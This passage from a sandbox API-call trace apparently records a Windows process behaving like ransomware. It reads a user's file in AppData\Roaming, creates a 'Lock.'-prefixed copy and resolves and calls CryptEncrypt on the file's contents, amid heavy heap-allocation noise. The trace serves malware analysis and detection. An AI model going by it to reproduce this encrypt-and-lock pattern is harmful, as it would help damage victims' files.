(HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0235.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0235.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0235.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0235.048] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/NRdQ.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nrdq.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0235.049] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.049] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0235.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0235.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0235.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0235.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0235.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0235.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0235.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0235.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0235.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0235.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0235.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0235.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0235.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0235.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0235.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0235.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0235.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0235.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0235.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0235.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0235.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0235.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0235.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0235.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0235.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0235.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0235.050] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0235.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0235.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0235.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0235.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0235.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0235.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0235.052] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.NRdQ.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.nrdq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0235.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0235.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0235.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0235.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0235.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0235.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0235.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0235.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0235.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0235.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0235.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0235.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0235.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0235.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0235.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0235.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0235.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0235.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0235.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0235.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0235.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0235.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0235.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0235.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0235.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0235.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0235.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe50020 [0235.058] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0235.058] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0235.061] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x4af9, lpOverlapped=0x0) returned 1 [0235.062] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0235.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0235.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0235.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0235.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14af9) returned 0x2f14818 [0235.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50020 | out: hHeap=0x970000) returned 1 [0235.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0235.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0235.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0235.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0235.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0235.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0235.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0235.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0235.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14af9) returned 0x2f29320 [0235.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0235.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.067] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0235.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0235.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0235.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0235.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0235.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14af9) returned 0x2f14818 [0235.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0235.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0235.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0235.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0235.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0235.067] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0235.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0235.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0235.068] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0235.068] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0235.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0235.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14af9) returned 0x2f14818 [0235.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d78 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0235.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ff8 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0235.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0235.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0235.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550d8 [0235.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0235.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0235.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0235.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0235.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0235.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0235.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0235.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0235.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14af9) returned 0x2e80330 [0235.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0235.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0235.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0235.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0235.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0235.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0235.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0235.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0235.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0235.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0235.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0235.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0235.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0235.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0235.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.256] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0235.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0235.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0235.256] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.256] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0235.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0235.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0235.256] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0235.256] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0235.256] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.256] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0235.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0235.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.257] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0235.257] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0235.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0235.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0235.257] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0235.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.257] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0235.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0235.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.257] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0235.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0235.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0235.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51400, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0235.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0235.259] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0235.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0235.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.259] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x14af9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x14b00) returned 1 [0235.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0235.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0235.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0235.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0235.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0235.259] 